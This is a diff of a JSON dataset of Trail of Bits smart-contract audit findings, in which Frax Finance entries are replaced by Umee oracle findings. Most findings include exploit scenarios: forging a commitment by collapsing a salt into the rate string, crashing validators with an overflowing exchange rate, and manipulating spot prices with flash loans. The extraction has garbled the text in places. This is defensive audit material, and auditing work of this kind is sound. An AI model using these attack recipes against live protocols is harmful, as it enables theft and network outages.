value, voters may not receive the rewards they are owed. The rounding operation is performed by the fmt.Sprintf(\"%f\", floatNum) function, which, as shown in Appendix C , may cut o decimal places from the square root value. // StandardDeviation returns the standard deviation by the power of the ExchangeRateVote. func (pb ExchangeRateBallot) StandardDeviation() (sdk.Dec, error ) { // (...) variance := sum.QuoInt64( int64 ( len (pb))) floatNum, err := strconv.ParseFloat(variance.String(), 64 ) if err != nil { /* (...) */ } floatNum = math.Sqrt(floatNum) standardDeviation, err := sdk.NewDecFromStr(fmt.Sprintf( \"%f\" , floatNum)) if err != nil { /* (...) */ } return standardDeviation, nil } Figure 2.1: Inaccurate oat conversions ( umee/x/oracle/types/ballot.go#L89-L97 ) Exploit Scenario A voter reports a price that should be within the reward spread. However, because the standard deviation value is rounded, the price is not within the reward spread, and the voter does not receive a reward. Recommendations Short term, have the ExchangeRateBallot.StandardDeviation function use the Dec.ApproxSqrt method to calculate the standard deviation instead of parsing the variance into a oat, calculating the square root, and parsing the formatted oat back into a value of the Dec type. That way, users who vote for exchange rates close to the correct reward spread will receive the rewards they are owed. Figure 2.2 shows a patch for this issue. diff --git a/x/oracle/types/ballot.go b/x/oracle/types/ballot.go index 6b201c2..9f6b579 100644 --- a/x/oracle/types/ballot.go +++ b/x/oracle/types/ballot.go @@ -1,12 +1,8 @@ package types import ( - - - - - + ) \"fmt\" \"math\" \"sort\" \"strconv\" sdk \"github.com/cosmos/cosmos-sdk/types\" \"sort\" // VoteForTally is a convenience wrapper to reduce redundant lookup cost. @@ - 88 , 13 + 84 , 8 @@ func (pb ExchangeRateBallot) StandardDeviation() (sdk.Dec, error ) { - - - - + - - variance := sum.QuoInt64( int64 ( len (pb))) floatNum, err := strconv.ParseFloat(variance.String(), 64 ) if err != nil { return sdk.ZeroDec(), err } standardDeviation, err := variance.ApproxSqrt() floatNum = math.Sqrt(floatNum) standardDeviation, err := sdk.NewDecFromStr(fmt.Sprintf( \"%f\" , floatNum)) if err != nil { return sdk.ZeroDec(), err } diff --git a/x/oracle/types/ballot_test.go b/x/oracle/types/ballot_test.go index 0cd09d8..0dd1f1a 100644 --- a/x/oracle/types/ballot_test.go +++ b/x/oracle/types/ballot_test.go @@ - 177 , 21 + 177 , 21 @@ func TestPBStandardDeviation(t *testing.T) { - + - + }, { }, { [] float64 { 1.0 , 2.0 , 10.0 , 100000.0 }, [] int64 { 1 , 1 , 100 , 1 }, [] bool { true , true , true , true }, sdk.NewDecWithPrec( 4999500036300 , OracleDecPrecision), sdk.MustNewDecFromStr( \"49995.000362536252310906\" ), // Adding fake validator doesn't change outcome [] float64 { 1.0 , 2.0 , 10.0 , 100000.0 , 10000000000 }, [] int64 { 1 , 1 , 100 , 1 , 10000 }, [] bool { true , true , true , true , false }, sdk.NewDecWithPrec( 447213595075100600 , OracleDecPrecision), sdk.MustNewDecFromStr( \"4472135950.751005519905537611\" ), // Tie votes [] float64 { 1.0 , 2.0 , 3.0 , 4.0 }, [] int64 { 1 , 100 , 100 , 1 }, - + [] bool { true , true , true , true }, sdk.NewDecWithPrec( 122474500 , OracleDecPrecision), sdk.MustNewDecFromStr( \"1.224744871391589049\" ), }, { // No votes Figure 2.2: A patch for this issue", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "13. Signicant code duplication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "Signicant code duplication exists throughout the codebase. Duplicate code can lead to incomplete xes or inconsistent behavior (e.g., because the code is modied in one location but not in all). For example, the FraxUnifiedFarmTemplate.sol and StakingRewardsMultiGauge.sol les both contain a retroCatchUp function. As seen in gure 13.1, the functions are almost identical. // If the period expired, renew it function retroCatchUp () internal { // Pull in rewards from the // If the period expired, renew it function retroCatchUp () internal { // Pull in rewards from the rewards distributor rewards distributor rewards_distributor. distributeReward ( addr ess ( this )); rewards_distributor. distributeReward ( addr ess ( this )); // Ensure the provided reward // Ensure the provided reward amount is not more than the balance in the contract. amount is not more than the balance in the contract. // This keeps the reward rate in // This keeps the reward rate in the right range, preventing overflows due to the right range, preventing overflows due to // very high values of rewardRate // very high values of rewardRate in the earned and rewardsPerToken functions; in the earned and rewardsPerToken functions; // Reward + leftover must be less // Reward + leftover must be less than 2^256 / 10^18 to avoid overflow. than 2^256 / 10^18 to avoid overflow. uint256 num_periods_elapsed = uint256 num_periods_elapsed = uint256 ( block .timestamp - periodFinish) / rewardsDuration; // Floor division to the nearest period uint256 ( block .timestamp. sub (periodFinish) ) / rewardsDuration; // Floor division to the nearest period // Make sure there are enough // Make sure there are enough tokens to renew the reward period tokens to renew the reward period for ( uint256 i = 0 ; i < for ( uint256 i = 0 ; i < rewardTokens.length; i++){ rewardTokens.length; i++){ require (( rewardRates (i) * rewardsDuration * (num_periods_elapsed + 1 )) <= ERC20 (rewardTokens[i]). balanceOf ( address ( this )), string ( abi . encodePacked ( \"Not enough reward tokens available: \" , rewardTokens[i])) ); require ( rewardRates (i). mul (rewardsDuratio n). mul (num_periods_elapsed + 1 ) <= ERC20 (rewardTokens[i]). balanceOf ( address ( this )), string ( abi . encodePacked ( \"Not enough reward tokens available: \" , rewardTokens[i])) ); } } // uint256 old_lastUpdateTime = // uint256 old_lastUpdateTime = lastUpdateTime; lastUpdateTime; // uint256 new_lastUpdateTime = // uint256 new_lastUpdateTime = block.timestamp; block.timestamp; // lastUpdateTime = periodFinish; periodFinish = periodFinish + // lastUpdateTime = periodFinish; periodFinish = ((num_periods_elapsed + 1 ) * rewardsDuration); periodFinish. add ((num_periods_elapsed. add ( 1 )). mul (rewardsDuration)); // Update the rewards and time _updateStoredRewardsAndTime (); _updateStoredRewardsAndTime (); emit // Update the fraxPerLPStored fraxPerLPStored = RewardsPeriodRenewed ( address (stakingToken )); fraxPerLPToken (); } } Figure 13.1: Left: contracts/Staking/FraxUnifiedFarmTemplate.sol#L463-L490 Right: contracts/Staking/StakingRewardsMultiGauge.sol#L637-L662 Exploit Scenario Alice, a Frax Finance developer, is asked to x a bug in the retroCatchUp function. Alice updates one instance of the function, but not both. Eve discovers a copy of the function in which the bug is not xed and exploits the bug. Recommendations Short term, perform a comprehensive code review and identify pieces of code that are semantically similar. Factor out those pieces of code into separate functions where it makes sense to do so. This will reduce the risk that those pieces of code diverge after the code is updated. Long term, adopt code practices that discourage code duplication. Doing so will help to prevent this problem from recurring.", + "title": "3. Vulnerabilities in exchange rate commitment scheme ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee oracle implements a commitment scheme in which users vote on new exchange rates by submitting \"pre-vote\" and \"vote\" messages. However, vulnerabilities in this scheme could allow an attacker to (1) predict the prices to which other voters have committed and (2) send two prices for an asset in a pre-vote message hash and then submit one of the prices in the vote message. (Note that predicting other prices would likely require the attacker to make some correct guesses about those prices.) The rst issue is that the random salt used in the scheme is too short. The salt is generated as two random bytes (gure 3.1) and is later hex-encoded and limited to four bytes (gure 3.2). As a result, an attacker could pre-compute the pre-vote commitment hash of every salt value (and thus the expected exchange rate), eectively violating the hiding property of the scheme. salt, err := GenerateSalt( 2 ) Figure 3.1: The salt-generation code ( umee/price-feeder/oracle/oracle.go#358 ) if len (msg.Salt) > 4 || len (msg.Salt) < 1 { return sdkerrors.Wrap(ErrInvalidSaltLength, \"salt length must be [1, 4]\" ) } Figure 3.2: The salt-validation logic ( umee/x/oracle/types/msgs.go#148150 ) The second issue is the lack of proper salt validation, which would guarantee sucient domain separation between a random salt and the exchange rate when the commitment hash is calculated. The domain separator string consists of a colon character, as shown in gure 3.3. However, there is no verication of whether the salt is a hex-encoded string or whether it contains the separator character; only the length of the salt is validated. This bug could allow an attacker to reveal an exchange rate other than the one the attacker had committed to, violating the binding property of the scheme. func GetAggregateVoteHash(salt string , exchangeRatesStr string , voter sdk.ValAddress) AggregateVoteHash { hash := tmhash.NewTruncated() sourceStr := fmt.Sprintf( \"%s:%s:%s\" , salt, exchangeRatesStr, voter.String() ) Figure 3.3: The generation of a commitment hash ( umee/x/oracle/types/hash.go#2325 ) The last vulnerability in the scheme is the insucient validation of exchange rate strings: the strings undergo unnecessary trimming, and the code checks only that len(denomAmountStr) is less than two (gure 3.4), rather than performing a stricter check to conrm that it is not equal to two. This could allow an attacker to exploit the second bug described in this nding. func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { tuplesStr = strings.TrimSpace(tuplesStr) if len (tuplesStr) == 0 { return nil , nil } tupleStrs := strings.Split(tuplesStr, \",\" ) // (...) for i, tupleStr := range tupleStrs { denomAmountStr := strings.Split(tupleStr, \":\" ) if len (denomAmountStr) < 2 { return nil , fmt.Errorf( \"invalid exchange rate %s\" , tupleStr) } } // (...) } Figure 3.4: The code that parses exchange rates ( umee/x/oracle/types/vote.go#7286 ) Exploit Scenario The maximum salt length of two is increased. During a subsequent pre-voting period, a malicious validator submits the following commitment hash: sha256(\"whatever:UMEE:123:UMEE:456,USDC:789:addr\") . (Note that represents a normal whitespace character.) Then, during the voting period, the attacker waits for all other validators to reveal their exchange rates and salts and then chooses the UMEE price that he will reveal ( 123 or 456 ). In this way, the attacker can manipulate the exchange rate to his advantage. If the attacker chooses to reveal a price of 123 , the following will occur: 1. The salt will be set to whatever . 2. The attacker will submit an exchange rate string of UMEE:123:UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever : UMEE:123:UMEE:456,USDC:789 : addr) . 4. The exchange rate will then be parsed as 123/789 (UMEE/USDC). Note that UMEE = 456 (with its leading whitespace character) will be ignored. This is because of the insucient validation of exchange rate strings (as described above) and the fact that only the rst and second items of denomAmountStr are used. (See the screenshot in Appendix D). If the attacker chooses to reveal a price of 456 , the following will occur: 1. The salt will be set to whatever:UMEE:123 . 2. The exchange rate string will be set to UMEE:456,USDC:789 . 3. The value will be hashed as sha256( whatever:UMEE:123 : UMEE:456,USDC:789 : addr) . 4. Because exchange rate strings undergo space trimming, the exchange rate will be parsed as 456/789 (UMEE/USDC). Recommendations Short term, take the following steps: Increase the salt length to prevent brute-force attacks. To ensure a security level of X bits, use salts of 2*X random bits. For example, for a 128-bit security level, use salts of 256 bits (32 bytes). Ensure domain separation by implementing validation of a salts format and accepting only hex-encoded strings. Implement stricter validation of exchange rates by ensuring that every exchange rate substring contains exactly one colon character and checking whether all denominations are included in the list of accepted denominations; also avoid trimming whitespaces at the beginning of the parsing process. Long term, consider replacing the truncated SHA-256 hash function with a SHA-512/256 or HMAC-SHA256 function. This will increase the level of security from 80 bits to about 128, which will help prevent collision and length extension attacks.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: Medium" ] }, { - "title": "14. StakingRewardsMultiGauge.recoverERC20 allows token managers to steal rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The recoverERC20 function in the StakingRewardsMultiGauge contract allows token managers to steal rewards. This violates conventions established by other Frax Solidity contracts in which recoverERC20 can be called only by the contract owner. The relevant code appears in gure 14.1. The recoverERC20 function checks whether the caller is a token manager and, if so, sends him the requested amount of the token he manages. Convention states that this function should be callable only by the contract owner. Moreover, its purpose is typically to recover tokens unrelated to the contract. // Added to support recovering LP Rewards and other mistaken tokens from other systems to be distributed to holders function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyTknMgrs ( tokenAddress ) { // Check if the desired token is a reward token bool isRewardToken = false ; for ( uint256 i = 0 ; i < rewardTokens.length; i++){ if (rewardTokens[i] == tokenAddress) { isRewardToken = true ; break ; } } // Only the reward managers can take back their reward tokens if (isRewardToken && rewardManagers[tokenAddress] == msg.sender ){ ERC20 (tokenAddress). transfer ( msg.sender , tokenAmount); emit Recovered ( msg.sender , tokenAddress, tokenAmount); return ; } Figure 14.1: contracts/Staking/StakingRewardsMultiGauge.sol#L798-L814 For comparison, consider the CCFrax1to1AMM contracts recoverERC20 function. It is callable only by the contract owner and specically disallows transferring tokens used by the contract. function recoverERC20 ( address tokenAddress , uint256 tokenAmount ) external onlyByOwner { require (!is_swap_token[tokenAddress], \"Cannot withdraw swap tokens\" ); TransferHelper. safeTransfer ( address (tokenAddress), msg.sender , tokenAmount); } Figure 14.2: contracts/Misc_AMOs/__CROSSCHAIN/Moonriver/CCFrax1to1AMM.sol#L340-L344 Exploit Scenario Eve tricks Frax Finance into making her a token manager for the StakingRewardsMultiGauge contract. When the contracts token balance is high, Eve withdraws the tokens and vanishes. Recommendations Short term, eliminate the token managers ability to call recoverERC20 . This will bring recoverERC20 in line with established conventions regarding the functions purpose and usage. Long term, regularly review all uses of contract modiers, such as onlyTknMgrs . Doing so will help to expose bugs like the one described here.", + "title": "4. Validators can crash other nodes by triggering an integer overow ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "By submitting a large exchange rate value, a validator can trigger an integer overow that will cause a Go panic and a node crash. The Umee oracle code checks that each exchange rate submitted by a validator is a positive value with a bit size of less than or equal to 256 (gures 4.1 and 4.2). The StandardDeviation method iterates over all exchange rates and adds up their squares (gure 4.3) but does not check for an overow. A large exchange rate value will cause the StandardDeviation method to panic when performing multiplication or addition . func ParseExchangeRateTuples(tuplesStr string ) (ExchangeRateTuples, error ) { // (...) for i, tupleStr := range tupleStrs { // (...) decCoin, err := sdk.NewDecFromStr(denomAmountStr[ 1 ]) // (...) if !decCoin.IsPositive() { return nil , types.ErrInvalidOraclePrice } Figure 4.1: The check of whether the exchange rate values are positive ( umee/x/oracle/types/vote.go#L71-L96 ) func (msg MsgAggregateExchangeRateVote) ValidateBasic() error { // (...) exchangeRates, err := ParseExchangeRateTuples(msg.ExchangeRates) if err != nil { /* (...) - returns wrapped error */ } for _, exchangeRate := range exchangeRates { // check overflow bit length if exchangeRate.ExchangeRate.BigInt().BitLen() > 255 +sdk.DecimalPrecisionBits // (...) - returns error Figure 4.2: The check of the exchange rate values bit lengths ( umee/x/oracle/types/msgs.go#L136-L146 ) sum := sdk.ZeroDec() for _, v := range pb { deviation := v.ExchangeRate.Sub(median) sum = sum.Add(deviation.Mul(deviation)) } Figure 4.3: Part of the StandardDeviation method ( umee/x/oracle/types/ballot.go#8387 ) The StandardDeviation method is called by the Tally function, which is called in the EndBlocker function. This means that an attacker could trigger an overow remotely in another validator node. Exploit Scenario A malicious validator commits to and then sends a large UMEE exchange rate value. As a result, all validator nodes crash, and the Umee blockchain network stops working. Recommendations Short term, implement overow checks for all arithmetic operations involving exchange rates. Long term, use fuzzing to ensure that no other parts of the code are vulnerable to overows.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "15. Convex_AMO_V2 custodian can withdraw rewards ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Convex_AMO_V2 custodian can withdraw rewards. This violates conventions established by other Frax Solidity contracts in which the custodian is only able to pause operations. The relevant code appears in gure 15.1. The withdrawRewards function is callable by the contract owner, governance, or the custodian. This provides signicantly more power to the custodian than other contracts in the Frax Solidity repository. function withdrawRewards ( uint256 crv_amt , uint256 cvx_amt , uint256 cvxCRV_amt , uint256 fxs_amt ) external onlyByOwnGovCust { if (crv_amt > 0 ) TransferHelper. safeTransfer (crv_address, msg.sender , crv_amt); if (cvx_amt > 0 ) TransferHelper. safeTransfer ( address (cvx), msg.sender , cvx_amt); if (cvxCRV_amt > 0 ) TransferHelper. safeTransfer (cvx_crv_address, msg.sender , cvxCRV_amt); if (fxs_amt > 0 ) TransferHelper. safeTransfer (fxs_address, msg.sender , fxs_amt); } Figure 15.1: contracts/Misc_AMOs/Convex_AMO_V2.sol#L425-L435 Exploit Scenario Eve tricks Frax Finance into making her the custodian for the Convex_AMO_V2 contract. When the unclaimed rewards are high, Eve withdraws them and vanishes. Recommendations Short term, determine whether the Convex_AMO_V2 custodian requires the ability to withdraw rewards. If so, document this as a security concern. This will help users to understand the risks associated with depositing funds into the Convex_AMO_V2 contract. Long term, implement a mechanism that allows rewards to be distributed without requiring the intervention of an intermediary. Reducing human involvement will increase users overall condence in the system.", + "title": "5. The repayValue variable is not used after being modied ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Keeper.LiquidateBorrow function uses the local variable repayValue to calculate the repayment.Amount value. If repayValue is greater than or equal to maxRepayValue , it is changed to that value. However, the repayValue variable is not used again after being modied, which suggests that the modication could be a bug or a code quality issue. func (k Keeper) LiquidateBorrow( // (...) // repayment cannot exceed borrowed value * close factor maxRepayValue := borrowValue.Mul(closeFactor) repayValue, err := k.TokenValue(ctx, repayment) if err != nil { return sdk.ZeroInt(), sdk.ZeroInt(), err } if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue).Quo( repayValue ).TruncateInt() repayValue = maxRepayValue } // (...) Figure 5.1: umee/x/leverage/keeper/keeper.go#L446-L456 We identied this issue by running CodeQL's DeadStoreOfLocal.ql query. Recommendations Short term, review and x the repayValue variable in the Keeper.LiquidateBorrow function, which is not used after being modied, to prevent related issues in the future.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "16. The FXS1559 documentation is inaccurate ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The FXS1559 documentation states that excess FRAX tokens are exchanged for FXS tokens, and the FXS tokens are then burned. However, the reality is that those FXS tokens are redistributed to veFXS holders. More specically, the documentation states the following: Specically, every time interval t, FXS1559 calculates the excess value above the CR [collateral ration] and mints FRAX in proportion to the collateral ratio against the value. It then uses the newly minted currency to purchase FXS on FRAX-FXS AMM pairs and burn it. However, in the FXS1559_AMO_V3 contract, the number of FXS tokens that are burned is a tunable parameter (see gures 16.1 and 16.2). The parameter defaults to, and is currently, 0 (according to Etherscan). burn_fraction = 0 ; // Give all to veFXS initially Figure 16.1: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L87 // Calculate the amount to burn vs give to the yield distributor uint256 amt_to_burn = fxs_received. mul (burn_fraction). div (PRICE_PRECISION); uint256 amt_to_yield_distributor = fxs_received. sub (amt_to_burn); // Burn some of the FXS burnFXS (amt_to_burn); // Give the rest to the yield distributor FXS. approve ( address (yieldDistributor), amt_to_yield_distributor); yieldDistributor. notifyRewardAmount (amt_to_yield_distributor); Figure 16.2: contracts/Misc_AMOs/FXS1559_AMO_V3.sol#L159-L168 Exploit Scenario Frax Finance is publicly shamed for claiming that FXS is deationary when it is not. Condence in FRAX declines, and it loses its peg as a result. Recommendations Short term, correct the documentation to indicate that some proportion of FXS tokens may be distributed to veFXS holders. This will help users to form correct expectations regarding the operation of the protocol. Long term, consider whether FXS tokens need to be redistributed. The documentation makes a compelling argument for burning FXS tokens. Adjusting the code to match the documentation might be a better way of resolving this discrepancy.", + "title": "6. Inconsistent error checks in GetSigners methods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The GetSigners methods in the x/oracle and x/leverage modules exhibit dierent error-handling behavior when parsing strings into validator or account addresses. The GetSigners methods in the x/oracle module always panic upon an error, while the methods in the x/leverage module explicitly ignore parsing errors. Figures 6.1 and 6.2 show examples of the GetSigners methods in those modules. We set the severity of this nding to informational because message addresses parsed in the x/leverage modules GetSigners methods are also validated in the ValidateBasic methods. As a result, the issue is not currently exploitable. // GetSigners implements sdk.Msg func (msg MsgDelegateFeedConsent) GetSigners() []sdk.AccAddress { operator, err := sdk.ValAddressFromBech32(msg.Operator) if err != nil { panic (err) } return []sdk.AccAddress{sdk.AccAddress(operator)} } Figure 6.1: umee/x/oracle/types/msgs.go#L174-L182 func (msg *MsgLendAsset) GetSigners() []sdk.AccAddress { lender, _ := sdk.AccAddressFromBech32(msg.GetLender()) return []sdk.AccAddress{lender} } Figure 6.2: umee/x/leverage/types/tx.go#L30-L33 Recommendations Short term, use a consistent error-handling process in the x/oracle and x/leverage modules GetSigners methods. The x/leverage module's GetSigners functions should handle errors in the same way that the x/oracle methods doby panicking.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Undetermined" + "Difficulty: High" ] }, { - "title": "17. Univ3LiquidityAMO defaults the price of collateral to $1 ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e188 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns ( uint256 ) { uint256 value_tally_e18 = 0 ; for ( uint i = 0 ; i < collateral_addresses.length; i++){ ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256 ( 18 ).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf( address ( this )).mul( 10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue (OracleLike oracle, uint256 balance ) public view returns ( uint256 ) { if ( address (oracle) == address ( 0 )) return balance; return balance.mul(oracle.read()).div( 1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insucient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the eect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization.", + "title": "7. Incorrect price assumption in the GetExchangeRateBase function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "If the denominator string passed to the GetExchangeRateBase function contains the substring USD (gure 7.1), the function returns 1 , presumably to indicate that the denominator is a stablecoin. If the system accepts an ERC20 token that is not a stablecoin but has a name containing USD, the system will report an incorrect exchange rate for the asset, which may enable token theft. Moreover, the price of an actual USD stablecoin may vary from USD 1. Therefore, if a stablecoin used as collateral for a loan loses its peg, the loan may not be liquidated correctly. // GetExchangeRateBase gets the consensus exchange rate of an asset // in the base denom (e.g. ATOM -> uatom) func (k Keeper) GetExchangeRateBase(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if strings.Contains(strings.ToUpper(denom), types.USDDenom) { return sdk.OneDec(), nil } // (...) Figure 7.1: umee/x/oracle/keeper/keeper.go#L89-L94 func (k Keeper) TokenPrice(ctx sdk.Context, denom string ) (sdk.Dec, error ) { if !k.IsAcceptedToken(ctx, denom) { return sdk.ZeroDec(), sdkerrors.Wrap(types.ErrInvalidAsset, denom) } price, err := k.oracleKeeper.GetExchangeRateBase(ctx, denom) // (...) return price, nil } Figure 7.2: umee/x/leverage/keeper/oracle.go#L12-L34 Exploit Scenario Umee adds the cUSDC ERC20 token as an accepted token. Upon its addition, its price is USD 0.02, not USD 1. However, because of the incorrect price assumption, the system sets its price to USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Exploit Scenario 2 The price of a stablecoin drops signicantly. However, the x/leverage module fails to detect the change and reports the price as USD 1. This enables an attacker to create an undercollateralized loan and to draw funds from the system. Recommendations Short term, remove the condition that causes the GetExchangeRateBase function to return a price of USD 1 for any asset whose name contains USD.", "labels": [ "Trail of Bits", "Severity: High", @@ -2532,19 +5290,19 @@ ] }, { - "title": "18. calc_withdraw_one_coin is vulnerable to manipulation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The showAllocations function determines the amount of collateral in dollars that a contract holds. calc_withdraw_one_coin is a Curve AMM function based on the current state of the pool and changes as trades are made through the pool. This spot price can be manipulated using a ash loan or large trade similar to the one described in TOB-FRSOL-006 . function showAllocations () public view returns (uint256[ 10 ] memory return_arr) { // ------------LP Balance------------ // Free LP uint256 lp_owned = (mim3crv_metapool.balanceOf(address(this))); // Staked in the vault uint256 lp_value_in_vault = MIM3CRVInVault(); lp_owned = lp_owned.add(lp_value_in_vault); // ------------3pool Withdrawable------------ uint256 mim3crv_supply = mim3crv_metapool.totalSupply(); uint256 mim_withdrawable = 0 ; uint256 _3pool_withdrawable = 0 ; if (lp_owned > 0 ) _3pool_withdrawable = mim3crv_metapool.calc_withdraw_one_coin(lp_owned, 1 ); // 1: 3pool index Figure 18.1: contracts/Misc_AMOs/MIM_Convex_AMO.sol#L145-160 Exploit Scenario MIM_Convex_AMO is included in FRAX.globalCollateralValue , and the FraxPoolV3.bonus_rate is nonzero. An attacker manipulates the return value of calc_withdraw_one_coin , causing the protocol to undervalue the collateral and reach a less-than-desired collateralization ratio. The attacker then calls FraxPoolV3.recollateralize , adds collateral, and sells the newly minted FXS tokens, including a bonus, for prot. Recommendations Short term, do not use the Curve AMM spot price to value collateral. Long term, use an oracle or get_virtual_price to reduce the likelihood of manipulation. References Medium, \"Economic Attack on Harvest FinanceDeep Dive\"", + "title": "8. Oracle price-feeder is vulnerable to manipulation by a single malicious price feed ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The price-feeder component uses a volume-weighted average price (VWAP) formula to compute average prices from various third-party providers. The price it determines is then sent to the x/oracle module, which commits it on-chain. However, an asset price could easily be manipulated by only one compromised or malfunctioning third-party provider. Exploit Scenario Most validators are using the Binance API as one of their price providers. The API is compromised by an attacker and suddenly starts to report prices that are much higher than those reported by other providers. However, the price-feeder instances being used by the validators do not detect the discrepancies in the Binance API prices. As a result, the VWAP value computed by the price-feeder and committed on-chain is much higher than it should be. Moreover, because most validators have committed the wrong price, the average computed on-chain is also wrong. The attacker then draws funds from the system. Recommendations Short term, implement a price-feeder mechanism for detecting the submission of wildly incorrect prices by a third-party provider. Have the system temporarily disable the use of the malfunctioning provider(s) and issue an alert calling for an investigation. If it is not possible to automatically identify the malfunctioning provider(s), stop committing prices. (Note, though, that this may result in a loss of interest for validators.) Consider implementing a similar mechanism in the x/oracle module so that it can identify when the exchange rates committed by validators are too similar to one another or to old values. References Synthetix Response to Oracle Incident", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: High", "Difficulty: High" ] }, { - "title": "19. Incorrect valuation of LP tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "The Frax Protocol uses liquidity pool (LP) tokens as collateral and includes their value in the global collateralization value. In addition to the protocols incorrect inclusion of FRAX as collateral (see TOB-FRSOL-024 ), the calculation of the value pool tokens representing Uniswap V2-like and Uniswap V3 positions is inaccurate. As a result, the global collateralization value could be incorrect. getAmount0ForLiquidity ( getAmount1ForLiquidity) returns the amount, not the value, of token0 (token1) in that price range; the price of FRAX should not be assumed to be $1, for the same reasons outlined in TOB-FRSOL-017 . The userStakedFrax helper function uses the metadata of each Uniswap V3 NFT to calculate the collateral value of the underlying tokens. Rather than using the current range, the function calls getAmount0ForLiquidty using the range set by a liquidity provider. This suggests that the current price of the assets is within the range set by the liquidity provider, which is not necessarily the case. If the market price is outside the given range, the underlying position will contain 100% of one token rather than a portion of both tokens. Thus, the underlying tokens will not be at a 50% allocation at all times, so this assumption is false. The actual redemption value of the NFT is not the same as what was deposited since the underlying token amounts and prices change with market conditions. In short, the current calculation does not update correctly as the price of assets change, and the global collateral value will be wrong. function userStakedFrax (address account ) public view returns (uint256) { uint256 frax_tally = 0 ; LockedNFT memory thisNFT; for (uint256 i = 0 ; i < lockedNFTs[account].length; i++) { thisNFT = lockedNFTs[account][i]; uint256 this_liq = thisNFT.liquidity; if (this_liq > 0 ){ uint160 sqrtRatioAX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_lower); uint160 sqrtRatioBX96 = TickMath.getSqrtRatioAtTick(thisNFT.tick_upper); if (frax_is_token0){ frax_tally = frax_tally.add(LiquidityAmounts.getAmount0ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } else { frax_tally = frax_tally.add(LiquidityAmounts.getAmount1ForLiquidity(sqrtRatioAX96, sqrtRatioBX96, uint128(thisNFT.liquidity))); } } } // In order to avoid excessive gas calculations and the input tokens ratios. 50% FRAX is assumed // If this were Uni V2, it would be akin to reserve0 & reserve1 math // There may be a more accurate way to calculate the above... return frax_tally.div( 2 ); } Figure 19.1: contracts/Staking/FraxUniV3Farm_Volatile.sol#L241-L263 In addition, the value of Uniswap V2 LP tokens is calculated incorrectly. The return value of getReserves is vulnerable to manipulation, as described in TOB-FRSOL-006 . Thus, the value should not be used to price LP tokens, as the value will vary signicantly when trades are performed through the given pool. Imprecise uctuations in the LP tokens values will result in an inaccurate global collateral value. function lpTokenInfo ( address pair_address ) public view returns ( uint256 [ 4 ] memory return_info) { // Instantiate the pair IUniswapV2Pair the_pair = IUniswapV2Pair(pair_address); // Get the reserves uint256 [] memory reserve_pack = new uint256 []( 3 ); // [0] = FRAX, [1] = FXS, [2] = Collateral ( uint256 reserve0 , uint256 reserve1 , ) = (the_pair.getReserves()); { // Get the underlying tokens in the LP address token0 = the_pair.token0(); address token1 = the_pair.token1(); // Test token0 if (token0 == canonical_frax_address) reserve_pack[ 0 ] = reserve0; else if (token0 == canonical_fxs_address) reserve_pack[ 